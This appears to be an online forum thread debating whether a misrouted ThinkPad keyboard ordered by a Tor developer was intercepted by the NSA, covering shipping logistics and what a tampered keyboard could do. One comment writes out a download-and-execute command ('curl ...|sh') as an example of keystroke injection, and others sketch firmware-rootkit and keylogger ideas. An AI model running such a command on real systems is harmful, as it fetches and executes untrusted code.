THAT'S RIGHT, it's time for WHICH IS MORE LIKELY?!
[intro music]
Today on Which is More Likely?, we're looking at a replacement Lenovo Thinkpad keyboard that was shipped to Alexandria, Virginia, instead of Seattle, Washington. What a blunder! [slide whistle sound effect]
Now put your thinking caps on and ponder, WHICH IS MORE LIKELY?!
• The largest intelligence agency on the planet, recently outed by Snowden's leaked documents for operating a multi-decade worldwide dragnet that secretly gathered communications on hundreds of millions of people, was too incompetent to have the US Postal Service display tracking information that hides the fact they're modifying a laptop keyboard in order to somehow spy on a Tor developer.
ORRRRRRRRRR!
• The third-party seller who uses Amazon to accept orders screwed up and gave Amazon the wrong tracking number.
That's all we have time for on today's episode of Which is More Likely? Don't change the channel! Up next is a BRAND NEW episode of Godwin's Law and Order! Good night from Hollywood!
Oh, I like this game. Let's play again: WHICH IS MORE LIKELY?!
* The world's largest online retailer that does $54M in sales per day has a bug in its procurement system that randomly transposes tracking codes.
ORRRRRRRR!
* The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
On the other hand, what's great about your way of putting it is that it juxtaposes your belief in the all-encompassing nature of the NSA's programs with your incredulity that such a program might have been applied specifically here. I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that there's no scenario in which you could be convinced that the NSA did anything.
And yet again, maybe it's time to stop thinking of the NSA as some far-off abstraction and start thinking about it as an actual thing that affects our daily lives.
I don't understand. Richard's point doesn't depend on an Amazon bug that transposes tracking codes. But your point does depend on the NSA redirecting packages to Alexandria in such a way that anyone who checked their order status would notice.
Why do you think NSA cares much about hiding their activities from you?
I can tell you a story. Some years ago, back in Russia, as a [naive] kid, I developed a surveillance system for Telrad telecom exchange [ultimately for FSB]. Do you think anyone cared to do that project in secrecy? I can give you the answer. Nope.
As far as I understand NSA can legally intercept packages and can legally install undetectable surveillance devices. As long as they are not using collected surveillance data, legally they are fine and they do not absolutely have to hide their activities at all costs. Hiding large scale operation is difficult and plugging every information leak is expensive. So they are not necessarily prioritizing that. So, yes, there is a chance that we simply see their activity. And yes, it could be just an Amazon bug.
During the cold war (and shortly after), this type of activity would be exactly what red-blooded Americans would say differentiated us from Russia (not hiding it, but doing it at all). Americans have constitutional protection against unreasonable search and seizure by the government.
These days you could probably drop the country and year and have trouble differentiating tactics used by the US and Russia.
It's going after low-hanging fruit to say this and while the link I'm providing is not the NSA, our government agencies seem to have a real hard time keeping secrets lately.
Part of this discussion seems based on a lack of understanding of the geography of the DC area. Alexandria is near these agencies, omg! But the fact is that there isn't much government in Alexandria. USPTO is there, and otherwise it's charming old houses, quirky shops, crappy strip malls, cookie-cutter suburbia, smallish high-rise apartments, railroad facilities, light industry, and other such similar things.
It's roughly like seeing your Mac get misdelivered to Richmond, CA and deciding that holy crap it's been intercepted by Apple on its way to me.
You're using public sources of information to refute theories of where a highly-secret and officially-denied program might operate. That makes no sense.
Whatever office, department, or contractor does the NSA's package intercepts, all public sources will describe it as something innocent and unrelated.
The guy I responded to is using that same information to try to support the theories. Either the info is good, or it's not.
I have no particular objection to saying, "this stuff would be secret so of course there would be no information on it". Oddly, nobody has actually tried that.
However, that still goes back to the point I raised: why Alexandria? It's not particularly convenient to the NSA. It's not convenient to shippers. It doesn't have anything special in the way of infrastructure. So it would be quite an odd choice. Possible, but it's not the smoking gun the article makes it out to be.
I specifically stated that I was just trying to point out that, despite your claim, there's something interesting in Alexandria.
There's no point in debating speculations beyond that because we don't have any information for or against.
It's just me stating "hey, it's possible" and refuting your suggestion that there isn't anything in Alexandria that could cause concern. I'm only answering a question you asked.
Yes, one part of what they do is in NJ/CA. Alexandria is where they're based. I'm not leaping to any conclusion; it just seems remotely possible and they're based there. You're the one saying there's nothing interesting in Alexandria.
Given what the company researches, their history and mission, it seems like exactly the sort of place where this wild theory suggested by the OP could be a reality.
The headquarters of a company like this isn't interesting. Headquarters are administrative centers. It's not where you send a laptop to have a bug installed.
I'll have to be explicit since this seems hard to understand:
You're the NSA. Who do you trust more:
A) (Perhaps the) CTO of a defense contractor that only works for you that you've had a 20 year working relationship with?
B) The bright eyed young scientists working for that contractor in a building 3000 miles away?
Or put another way, despite the Snowden leak, I'll bet you any amount of money that the NSA is still in "really fucking tight" with Booz Allen Hamilton.
In one paragraph, you seem to be saying that the NSA wouldn't trust the employees of contractors. In the next paragraph, you tell me that the NSA is still "really fucking tight" with Booz Allen. These two ideas seem completely contradictory.
But I think you might be suggesting that the NSA has given up on the low-level employees, and is now having the executives of these companies do the work directly. Which seems completely ludicrous to me, as no C-level at a company like this (even the CTO) is going to have the requisite skills, and even if he did he's not going to have the time.
You think along the narrowest lines of anyone I've ever held a conversation with.
Not executives specifically but somebody trusted. That's more likely to be in the building where administration is done than anywhere else. Also you want to separate research from implementation. Your narrow refusal to even consider that there might be an interesting place for an agency to ship a laptop component to in Alexandria has taken this exercise way further than it needs to be to demonstrate the point.
What you see as narrow thinking is just complete disagreement on how companies like this are structured.
For example, I live a couple of miles from the headquarters of Exxon Mobil. Yet it's about the last place I'd look if I wanted to find a trustworthy person to drill an oil well or build a gas pipeline.
Also, I'm not refusing to consider that Alexandria might be a viable destination for this. I merely think it's unlikely, especially compared to the "military and intelligence belt" language used in the post.
No one thinks redirection would be visible to 'anyone'. The theory is this could be a one-time screw-up, like a redaction failure, revealing a waypoint that was supposed to be secret. (Maybe a label that was supposed to go on the outer box went on the inner box instead?)
I'd agree an innocent screw-up is far more likely, here and in any particular case where something weird happens. Weird stuff happens with shipping all the time.
But since we know shipment interception is part of the NSA toolkit, and the NSA cares about Tor, people aren't crazy to be curious and even paranoid around remote possibilities. And if I were a Tor developer, I might buy all my hardware from store shelves with cash.
No, he's saying that anyone who checked their order status shouldn't notice (by design), but maybe that part of the process failed this time.
Also, that failure might be technical or intentional. As I mentioned on another subthread, it's always possible this was "accidentally" exposed by an employee working at the merchant or postal service. The program would require their cooperation. After all, we first learned about the telco spying because telco employees spoke up.
As for whether it's conceivable that NSA would target a Tor developer? A few months ago they were spying on our close friends and allies simply because they could. If that same mindset were applied to the intercept program, then this isn't impossible to imagine. Just because the NSA and administration have finally recognized their overreach and have started backpedalling doesn't mean these programs change overnight.
It is difficult to predict NSA actions, but opportunistically putting up inexpensive surveillance on all Tor users and nodes seems like a reasonable thing to do. As a developer she is a Tor user and also probably operates a few Tor nodes [for debugging and testing purposes]. So she would be in that group. I think this is plausible. I doubt that NSA would specifically target a Tor developer in US, without court order, as this would probably be illegal. [Although subverting some Tor developers, especially ones who build Tor binaries would be useful.]
> The intelligence agency whose massive scope and pervasive operational shortcomings were recently exposed by one low-level operative had a slip-up in applying a well-publicized tactic to an obviously high value target.
A few comments:
• This "low-level operative" was a system administrator who used social engineering to obtain other people's authentication credentials and gain access to material to which he wasn't authorized. He wasn't the janitor or some clueless field agent.
• Did Snowden expose operational shortcomings? Absolutely. A lot of the programs that have been publicly revealed through his leaks have been running for over a decade without ever seeing the light of day, though. That tells me these "pervasive operational shortcomings" aren't very pervasive. (If they were, the NSA would be absolute shit at their mission.)
• I don't think Andrea is a "high value target," or at least high value enough to risk compromising whatever method they might use to bug her keyboard. I don't say this to belittle her or her work in any way — she seems to be a skilled programmer/hacker/infosec person. And that's exactly why this whole "the NSA is bugging her keyboard" theory doesn't make any sense.
Let's assume for the sake of argument that the NSA had planned to bug her keyboard, and that keyboard is now sitting in an NSA (or contractor) facility in/near Alexandria, Virginia, waiting for some modification to be made before shipping it back out. But, oops, they screwed up and forgot to fake the USPS tracking information. They know she knows because she tweeted about it. She's also tweeted that she can never trust the keyboard if/when it shows up. Why would they ship her a bugged keyboard at this point? If/when the keyboard shows up, she's probably going to take it apart and share anything interesting she finds with the world. There will be hard evidence.
Even if they hadn't bungled the tracking information in our hypothetical argument, they're risking exposure of the exact methods they use to bug a machine for not much potential gain. (Remember, Andrea's a skilled hacker/programmer. There's a very good chance she'll figure out what's going on and tell the world if she has any inkling that her laptop's been tampered with.)
• The keyboard she ordered fits a ThinkPad T60/T61/T400/T500 (and the equivalent "R" models, plus a few others). Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
• I said that I don't think Andrea is a "high value target," despite her work on Tor, because everything about Tor is open. Anyone can download the code and see exactly how it works. The protocol is well-known. There's no curtain to peek behind and gain strategic information about Tor's workings.
So while I don't reject the argument that the NSA is trying to bug her laptop as impossible, I think it's exceedingly improbable. My money's still on "seller screwed up the tracking number."
> I also like the part where the NSA is guarded by the Catch-22 "it wasn't them, because if it was, you'd never know", such that there's no scenario in which you could be convinced that the NSA did anything.
The flip side of this argument, which everyone here seems to be clutching onto and running with, is that if the NSA is capable of it, they're doing it at every available opportunity, even when it doesn't make any sense to.
> Internally, the keyboard and TrackPoint speak PS/2. While they could log keystrokes to an on-board chip and transmit keystrokes via radio, there aren't any especially interesting things the NSA can do to her laptop via a modified keyboard. They certainly won't be rooting it that way.
This is a joke, right? A keyboard and a keylogger would give you everything you need to root a computer.
My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access.
If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.
Why when a shell is focused? Better to wait until the keyboard has been idle for some time, then send the keystrokes to open a shell, execute the needed commands, and close it afterward.
Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.
"we describe how to tamper with a firmware upgrade to the Apple Aluminum Keyboard. We describe how an attacker can subvert an off-the-shelf keyboard by embedding into the firmware malicious code which allows a rootkit to survive a clean re-installation of the host operating system."
DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.
I would speculate that they might be interested in submitting a patch that compromises the Tor network in some subtle way that only they can exploit, and doing it in her name. Maybe added on to some other big change she submitted, in the hope that nobody will notice it.
Seems the Tor project is using Git for all of their projects, so doing something like that would probably require pwning whatever system she's creating commits on. I will say that putting a bug or something in her keyboard doesn't seem like a terribly efficient way of doing this.
I don't really think that they're trying to break Tor like this. More of a thought experiment - to figure out the likelihood that this is part of an attempt to break Tor, run through the details of exactly how this would be part of such an attempt. It doesn't sound all that practical when you run through how it would work if it was. If they wanted to do it, you'd think they have better ways than a rather sloppy attempt to intercept a laptop keyboard shipment, if that's actually what this was, instead of an ordinary shipment screw-up.
All good points, and I'd second that Andrea is unlikely to be a "high value target" [BTW, curious, who is building and releasing Tor binaries and Tor dependencies binaries?]. Still, as a developer she is a Tor user and it is possible that NSA opportunistically targets all Tor users. And even if not, I'm still finding it distasteful that NSA can legally intercept post and put up dragnet surveillance. It feels like they are using legal loopholes too. Not fair.
That generated more response than I expected. I actually do agree that, on balance, it's somewhat more likely that it's just a benign glitch; I should have said that. What I was really taking issue with is the dismissiveness with which you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
So with less snark: I don't think it's exceedingly improbable at all, and whether ultimately it turns out to be the case or not, smugly guffawing the idea that the NSA may have used a trick like that isn't warranted. They really do intercept people's laptop shipments [1] to plant malware in them. They really do sneak tiny radio transmitters into end-user hardware. They really are trying to get backdoors into communication tools. I'll put it this way: if I worked on the kind of software Andrea works on, I would be seriously alarmed. Would you keep the keyboard?
On some specific points you made:
* That Snowden had access to other people's credentials seems like a serious operational shortcoming to me. The "low-level" part wasn't an attack on Snowden; the point is that a lot of people have that level of access. In general, the US intelligence apparatus makes a lot of well-publicized mistakes; I'm sure they make a great number of more subtle ones.
* On the NSA's shortcomings generally, I think this is actually nicely illustrative. Because a lot of the stuff Snowden revealed were things a lot of credible people already believed, based on things like weird locked server closets in telecom buildings and PRNGs that seemed fishy and pointless and hearsay reports of requests for backdoor access to communication tools and so on. There was just little hard evidence before Snowden. And there won't be here either. So this is entirely consistent with what the NSA was like in those decades where their programs "never saw the light of day".
* I think being a core Tor developer makes her a high value target. It's hard to imagine the NSA wanting to subvert all the things it's subverted and not wanting to backdoor Tor. Keylogging her keyboard is a great way to do that, either by compromising her somehow, or by just stealing her credentials. So I don't follow the "it doesn't make any sense" line of thinking.
* That she's now tweeted about it certainly makes it unlikely that, if the NSA has it, they'll go through with sending it bugged. But so?
Where I come out on this is that yes, it's probably nothing, but it should be treated with suspicion and carefulness, not laughed off because haha, what, do you think you're in a spy movie or something? Because, basically, we are.
[1] Yes, I know this is just the keyboard. I don't think that's a relevant difference.
> What I was really taking issue with is the dismissiveness with which you treated the suggestion that this might be an NSA attack. I was responding to what I saw as a slanted and unreasonable framing by doing the same thing from the other end.
I was dismissing the linked blog post as much as the suggestion of NSA involvement. The blog post took a single tweet with a single screenshot, screwed up half the facts ("tracking details for a computer Shepard ordered" — uh, no, it was a used laptop keyboard), sensationalized the other half ("it moved another four times around the military and industrial belt" — uh, no, it moved from IAD to Alexandria), and tacked a pile of rhetorical questions and conjecture on the end.
a couple weeks ago, my wife received an order from Banana Republic that was intended for a recipient in Newfoundland. the correct recipient's name was on the packlist inside the box but they showed it to the wrong person. likewise, my wife's actual offer took a few days longer to arrive, too. I suspect it was simple mistake in the warehouse where an operator had two boxes, printed waybill stickers for both, and then slapped them on the wrong - already sealed - packages. I bet similar things happen regularly.
Maybe this is Amazon/USPS's shipping version of the warrant canary? If Apple does it...
Imagine that we're not in the US for a second and that this were a journalist? Would your opinion of what happened change?
It would have to be a mis-delivery at least instead of a "wrong tracking number". How likely is it that Amazon would ship something from a CA warehouse and it take more than 2 days to get to Seattle? Also keep in mind that USPS does Saturday delivery.
Also, nice defense of the NSA, but keep in mind this is the same intelligence agency that gave pretty much unfettered document access to independent contractor Systems Administrators.
You are either stupid or subversive. By now we all know Keith Alexander’s view of hackers (socially disabled, semi-autistic kids sitting behind a laptop at 4 a.m. wearing a batman suit and gloves) and his view on technical matters is equal with Comodo’s [2] leader. As for NSA having skilled personnel??? Sure - some of them are skilled - but they don’t take decisions[1]. The stupid guys do (again, K. Alexander is an excellent reference for incompetence add to that that he is a liar[3] and you’ve got an explosive mix).
NOTE: In “War and Peace” - Tolstoy’s masterpiece - there’s a Russian officer (Prince Andrey IIRC) who realizes the insane tragedy of human history: While the Prussian and Russian army coalition (hundreds of thousands of men, with families and lives left behind…) is about to face the fiercest opponent of their era (Napoleon, is a legend among Russian military officials) the two Generals (Prussian and Russian) are fighting and sabotaging each other about who is going to lead the battle… Until it’s too late. They both get easily crashed, without putting up a fight.
So you can play naive, stupid, stunned or cunning all you like but human history is FULL of stupid people in position of power.
No we did not. This is perhaps the most annoying meme to have come out of the Wikileaks and Snowden disclosures. Nobody working in technology laughed about dragnet surveillance or cryptanalysis capabilities or trojan horses. The 1990s was the era of Clipper and Echelon. People did not assume in the 1990s that the intelligence community was benign or disconnected. All you have to do is read _Applied Cryptography_ to see a sober, expansive concern about NSA surveillance. And Schneier's writing was far more carefully considered than, say, Usenet.
For fuck's sake, the most popular show on television centered on government conspiracies.
The millennials did not invent distrust of the government.
The disdain with which you discard my memories of that time is... interesting.
Invent distrust? Of course not.
However, I and my colleagues (as I recall), at the time just did not take the threat of government surveillance seriously. Did I trust the government? Yes. Yes I did. I'm Dutch. We have a childlike faith in our government. Being spied on by the government was something that happened on the other side of the former Iron Curtain. And in the US. Surely not our very own flattened nook of the world.
And would this surveillance of other governments affect me? Ha! Why would it?
Sure I was naive. And I was hardly alone. Were there more enlightened souls, such as yourself? I'm willing to go out on a limb and trust that there were.
Does that discount my memory of being ridiculed as paranoid for using PGP? Or the times I ridiculed friends and colleagues myself for taking measures against being listened in on? I hope not.
You weren't just naive. You were anomalously naive. It's funny you should mention PGP: the 1990s were the time of the crypto-wars, which were in part sparked by PGP. Remember "this t-shirt is a munition"? You couldn't even sell products with crypto in them without jumping through hoops.
If you had to break the last 20 years into three time periods: (1) "post Snowden", (2) "post-9/11", and (3) "post PGP", sensitivity to government surveillance would rank 1-3-2. The NSA was a bigger deal in the 1990s than it was in the 2000s, even after the AT&T "Room 101" disclosure.
"this t-shirt is ammo" is an American cultural artifact.
there was some support for the projects (the PGP source scanning thing, extra-US hosting of crypto software, ...), but other than that, this was the US being stupidly paranoid as usual.
That "you" couldn't sell products with crypto in them was a great business opportunity for a number of European vendors, by the way.
Enemy of the State, The Simpsons.. even AAA movies like Swordfish.. "The Carnivore program, reading every ISP subscribers email- I did what every federal judge wouldn't do"
Maybe it makes me a looney but I was educated about things like COINTELPRO and TEMPEST before I was a teenager and the idea that a government wouldn't be doing these things is more surprising to me than the leaks that they are.
Well, I made a long, detailed, and reasoned reply to one of the replies to my "lack of tact" post, and it got downvoted to -1. So there you go. Yay HN.
> The third-party seller who uses Amazon to accept orders screwed up and gave Amazon the wrong tracking number.
This should be easy to find out. Check if the tracking number on the website differs from what's printed on the package itself, and if so what the tracking for it looks like.
Yep. But the package hasn't arrived, so all we can do is make wild-assed hand-wavy conjecture. Or something.
Of note, when searching Amazon for "NEW and ORIGINAL IBM Lenovo Thinkpad Keyboard 42T3209 42T3177", I find one seller ("u fix it", who "Ships from TN") selling that item. Assuming that's the seller Andrea bought the keyboard from, that clearly doesn't jive with the tracking information, which shows the item shipping from California.
You are asking which is more likely. I.e. is the probability of compromise higher than 50%?
I'd say the probability is less than that. But I think even risks with lower than half probability are worth worrying about.
The obvious explanation here is that the USPS fucked up. As the tweet says, you'd think the NSA program would be more subtle. Further, there isn't much in the way of intelligence presence in Alexandria. So what's more likely: that the NSA does this program in a secret location that's still right next to all the non-secret stuff, and they can't cover up the tracking data, or that the USPS accidentally sent a package to the wrong place?
Edit: I want to emphasize how incredibly stupid the article is when analyzing the tracking data. Key quote:
"From Dulles, it moved another four times around the military and intelligence belt in suburban Washington DC, finally landing in Alexandria at 11:03 am on January 23."
First of all, there is nothing significant to Dulles. It's the largest airport in the area, and this makes it the arrival point for any packages coming in by air. 90% of my packages have a "Dulles, VA" tracking entry on them by the time they get to me.
Second, it didn't move "four times". It went from Dulles to a carrier facility in Alexandria, then it went out for delivery and got delivered. That's two moves. And how many times do you expect it to move? That's how air-based package delivery works. It goes to an airport. Then it goes to a local sorting facility. Then it goes out for delivery.
Third, the phrase "military and intelligence belt" is ridiculous. Especially so when the only two locations involved are Dulles and Alexandria, neither of which has much in the way of either military or intelligence.
The article tries way too hard to make its case, and uses a great deal of purple prose to state what comes down to, "the package got delivered to Alexandria, VA which is close to a lot of government agencies". That would actually be more convincing than the insanity they wrote, although still not very convincing. But at least it would be honest.
At this point aren't we all just guessing? Reading this thread I'm surprised how strongly many folks I respect (like you - viva FQ&A!) are insisting this could not be an NSA screw up. The truth is we don't know, so why rush to conclusions (even benign conclusions) instead of waiting to learn more?
And imagine if you were Andrea and you develop software that dissidents around the world depend on with their life, while also knowing the NSA has simultaneously tried to weaken it. If the laptop does get rerouted to her with an apology from USPS and you were her, are you saying you wouldn't hesitate even a little before accepting it and transferring your data onto it?
Ultimately, I think that's the real story here. The biggest problem with having a government that watches its citizens isn't the watching per se, it's the loss of trust.
And I think you misunderstand. I am not arguing that it "could not be" the NSA. And I haven't seen anyone say that. I am simply arguing that it is extremely unlikely.
It's a guess, yes, but it's an informed guess. It's a matter of looking at probabilities and seeing what's more likely. Shippers screw up all the time. Packages make crazy detours because somebody tossed a box in the wrong truck. A label falls off and a mixup occurs. Somebody typos a tracking number.
On the other hand, for this to be the NSA, several unlikely things would have to be true:
1. The NSA would need to be intercepting computer equipment destined for certain people and modifying it to spy on them.
2. The NSA would need to be targeting the person in question for this program.
3. The NSA would need to have set up this program in such a boneheaded way that it shows up on a package tracker. (If I were in charge of this program, I'd just set it up in FedEx's sorting facility in Memphis and then ensure all the relevant equipment uses FedEx. Simple, fast, and no chance of the target finding out.)
4. The NSA would need to have set up this program in Alexandria, even though it has little to recommend it for such a thing.
Now, we know that #1 is actually true. So that's one requirement fulfilled, out of several. But what about the rest?
I'm somewhat skeptical on #2. It's possible, but it seems unlikely. Why would the NSA target Tor developers? The security of Tor falls apart in the presence of an adversary that is able to monitor the entire internet, because you can just correlate traffic that enters with traffic that exits. The NSA can presumably monitor enough of the internet to defeat Tor right now. So why bother spying on Tor developers? It's possible as a belt-and-suspenders maneuver, but this person just doesn't strike me as a likely target.
I'm really skeptical on #3. It's about as believable as having the FBI spy on me by parking a van outside my house that says "Flowers By Irene". It's possible, but really unlikely.
And #4 doesn't make a whole lot of sense to me. Again, possible, but unlikely.
So we have one thing that's true, and then several other things that are individually unlikely, and combine to be really unlikely. It looks to me that people are committing the basic fallacy of thinking that the truth of #1, since it's unlikely, somehow makes the rest more likely too.
It comes down to this: is it a screwup by USPS or Amazon or a third-party reseller, or is it the NSA screwing up royally while trying to plant a bug? In the absence of evidence, we are stuck guessing, but we can guess intelligently by realizing that one is vastly more likely than the others.
"When you hear hoofbeats, think of horses not zebras."
That doesn't mean zebras are impossible. But it means you should prefer the more obvious explanation unless there's evidence to the contrary.
Fair enough, and thanks for the thoughtful reply. I didn't mean to misrepresent your position -- I took "The obvious explanation here is that the USPS fucked up" to mean you believed it couldn't be otherwise, rather than when weighing the evidence the more obvious [simpler] explanation is that USPS screwed up.
Like you, I'm also a big proponent of Occam's razor. (Having been a med student, you don't know how many times I heard that "think horses not zebras" analogy from attendings.) I guess it just comes down to the degree of faith each of us has in the NSA and their corporate partners. Some of us are more willing to doubt their actions and/or believe it's possible they could screw up this way. But at this point we can only wait and see if we learn anything more in the coming days -- though probably not. One would hope the NSA is competent enough to cover this up, even if it was their screw up.
Added: BTW, there is another explanation that no one has mentioned. Leaving the Alexandria issue aside, the NSA interception program obviously relies on participation from one or more corporate partners. And just as we've seen at the telcos, it's reasonable to assume that there are staff at those partners who aren't particularly enthusiastic about the program. So it's possible someone decided to "accidentally" bypass/skip an important step that would have obscured this. It's not a huge leap to imagine a motivated techie realizing that this particular delivery would be an ideal opportunity to direct a lot of attention to the interception program -- if they felt compelled to take the risk. I'm definitely not saying this is the (or even a) likely possibility, but it's probably the only way we'll ever know if it was in fact the NSA.
Would you care to refute that instead of just shouting? Like, point out something that contradicts it? Because I can't think of any, and I lived in Alexandria for seven years.
When I read the headline, and the comments here before reading the article, I was expecting to see tracking data that went from the seller to the buyer with a mysterious stop near the NSA.
Then I read the article. The tracking data shows a delivery to a destination near the NSA.
Does anyone here seriously think that the mechanism the NSA uses if they want to tamper with a laptop on the way is to simply change the destination address to be the NSA? And that no one has noticed this before?
If they are intercepting and modifying domestic shipments, the mechanism would be something that is executed AT the shipping carrier facilities or possibly during the final delivery, and would be completely transparent to outside observers, including both the sender and the receiver of the package.
Watch the "Modern Marvels" episode on package delivery for a look at how the automated package movement systems work at the major hubs, and you'll see how a package could be diverted for special treatment and then re-inserted into the system transparently, with most workers at the facility having no idea something special is going on.
The best chance at detecting this from outside would probably be to look at next day delivery orders on items that would be the most time consuming to modify, to see if those are more likely to miss their delivery deadline. The idea is that with such a tight schedule, the chances are higher that an interception will blow the delivery schedule. For items ordered with two day or longer shipment, the delay in modifying the item could be made up by upgrading it to one day delivery in the system when it is re-inserted. That's why observing one day delivery items is the best bet.
> Does anyone here seriously think that the mechanism the NSA uses if they want to tamper with a laptop on the way is to simply change the destination address to be the NSA? And that no one has noticed this before?
No that doesn't pass the giggle test. If it has anything at all to do with the NSA, it's a blunder.
I believe it was season 5, episode 1, "Deliver It". They focus on UPS but things would be similar for other carriers. The UPS part starts about 9 minutes in. If you have Amazon Prime, they have it for free streaming.
BTW, UPS would be particularly good for intercepts, because UPS operates an electronics repair facility that does factory authorized repairs. When you think you are sending your broken laptop by UPS to, say, Toshiba, it can get automatically diverted to the UPS repair facility a couple miles from the hub, where Toshiba-trained technicians do the repair.
This means that a laptop shipment being diverted for the NSA would not even have to be done with some secret diverter on the line somewhere. They could just make it look like an ordinary repair job. The repair facility is large. Who would know if one or two of the repair technicians are really NSA agents?
As much as I'd like to believe that they did mess up the interception reporting (if they really do interception like that), I've seen enough crazy tracking reports that I wouldn't be surprised if it was just a stupid mistake.
Just googling for "funny delivery tracking route" for example will give you things like:
ITT, people who have never been to DC. Dulles is one of the main airports everything flies into for DC. As far as I know, it is the biggest.
Dulles has a lot of government contractors and big companies in the area, but that's about it.
What would be suspicious is if it went from Dulles to Langley, from Langley to Ft. Meade, from Ft. Meade to Quantico, and from Quantico to Alexandria....but Dulles to Alexandria is really standard.
edit: It isn't like it got back on a plane and went back to Seattle to be delivered to this girl. It looks like they straight delivered it to the wrong city. The government has pretty good OpSec when it comes to things like this. You think they would straight up route her package through Ft. Meade if they were planning to install malware on her computer?
Yep, the last few lines of the package tracking could have come from about 90% of the packages I had delivered to my house in the past few years, until I moved out of Alexandria.
The keyboard can be modified, for example, with SURLYSPAWN, a 'Keystroke monitor technology that can be used on remote computers that are not internet connected'. It's probably one of the most used NSA devices, being cheap ($30) and easily installable.
Worse: laptop keyboards are usually connected to a special embedded firmware (IIRC on my Clevo laptop it's called EC, short for embedded controller), which handles the FN+x key combos like LCD brightness, volume control, keyboard backlight (Lenovo!), WiFi/BT/cellphone-data connectivity, webcam enabling (!) and other detailed functions.
Now, if this EC chip is vulnerable, a malicious keyboard can have direct DMA access (just like FireWire controllers, EC is usually connected to the main PCI bus)... no need for drivers here.
As per my other post, the keyboard is most likely a PS2 keyboard interface (physical or emulated) connected to a simple PS2/LPC(ISA) bus interface inside the EC. It will literally deliver an IRQ to that bus (IRQ 1) at which point the EC has to suck down a character from the keyboard buffer and do something with it.
It's not clever, can't use DMA and generally is the dumbest thing in the entire machine.
If they somehow manage to work around it I'd eat a box of lightbulbs. It's hard enough to coerce it to work to start with.
Source: I used to design embedded PC kit from the board level.
But one question remains: how does the EC control stuff like the bluetooth radio and webcams? They're USB devices to the OS, so in theory there should be a USB hub inside the EC?
Not necessarily. It may only have power control function. If you pull a USB device out it's the same as turning it off in theory and vice versa. It's probably just turning the device off or setting it into standby mode.
edit to add: some Intel south bridges have integrated EC which makes things a little uncertain.
Laptop keyboards are directly connected to embedded controller primarily because they are completely passive switch matrices (and EC includes - often directly in hardware - logic for scanning keyboard matrix), so there is nothing meaningful to exploit on the EC side.
Also connecting EC directly to some PCI bus does not make much sense from both system design and cost perspectives. Usual place to connect EC to is LPC, which is explicitly designed for such devices (things on motherboard like serial/parallel/game ports, TPM, FDC, keyboard controller/EC, BIOS flash and various ). Random review of datasheets found by google seems to indicate that chips that are only embedded controllers and do not contain additional ISA based peripherals (like ISA DMA controller itself) tend to not even implement the pin required for LPC DMA/bus master transactions (as it is not required for anything in normal operation).
I don't believe HIDs have the ability to install arbitrary drivers. Windows will try to identify the device and locate the driver via Windows Update, or use a generic HID driver. Or the OEM may have preinstalled drivers.
In any case, a malicious keyboard can simulate keypresses and pwn your machine that way. No evil driver needed.
Actually no. The keyboard is still an old fashioned PS2 device on the majority of laptops. It connects to the LPC bus (low pin count - similar to ISA) via a PS2/ISA bridge in the embedded controller. It's just like in an oooooold AT PC. There is no possibility for it to deliver anything but keystrokes. It doesn't go anywhere near the USB stack and can't inject devices or play with the HID drivers.
Keystrokes can be dangerous on their own but engineering a solution to this that assumes the correct state of the machine and can operate software is unlikely simply due to the margin of error.
It's possible, but there is no evidence suggesting that is what happened here.
The overwhelming likelihood is that the package simply took an unusual route due to factors that are unknown to us. For this story to be true, it would require a level of incompetence that is orders of magnitude beyond that which we have previously seen from the NSA.
It fits. The answer is almost certainly No (an honest mistake is far more likely, and nefarious activity wouldn't look like this anyway), and you can tell from the way they write (e.g. vastly exaggerating the import of the tracking info) that they deeply want this to be true.
I give it about 50/50 odds that a followup article shows up along the lines of, "they received the laptop and the tracking info for this package shows it coming straight from the warehouse nearby and this is clearly evidence that the NSA is screwing with USPS tracking data."
I hope this was not posted before the keyboard arrived. Should be easy enough to have it taken apart by an expert and see if anything is fishy (and to check if tracking numbers match).
All this speculation about what any TLA's may or may not have done seems fruitless to me. If the keyboard seems legitimately suspect, send it to someone to do a teardown or plug it in and capture communications, and find out. That way we'll learn something concrete, and not reinforce this 'NSA of doooooom' crowd mentality.
Apparently, they do. Until Snowden releases something along the lines of "List with 1.500 gadgets that Amazon released that were bugged". Then suddenly we'll be like "Oh Jeez, I thought but it but I never really believed...".
The thing is "Would the NSA wanna bug a TOR developer's computer"? and the answer is "Damn, sure!".
So it's not as far fetched as many here believe imho - and NO there are not many better ways than this, I can't think of any.
Exactly. This is why many people in tech weren't that surprised by Snowden's leaks and were slightly relieved just to see all the suspicions verified. But most people seem to need a powerpoint explicitly stating what's going on before they believe it. Prior leaks from NSA defectors without hard proof had almost no recognition by the public. Even full in-depth exclusives from Washington Post didn't seem to affect people.
I'm inclined to believe that this is a mistake - "extraordinary claims require extraordinary evidence" and all that.
...However, since hypothetically this could happen, how could it be prevented? Would there be some unbreakable way for a manufacturer to tell you if the keyboard had been tampered with?
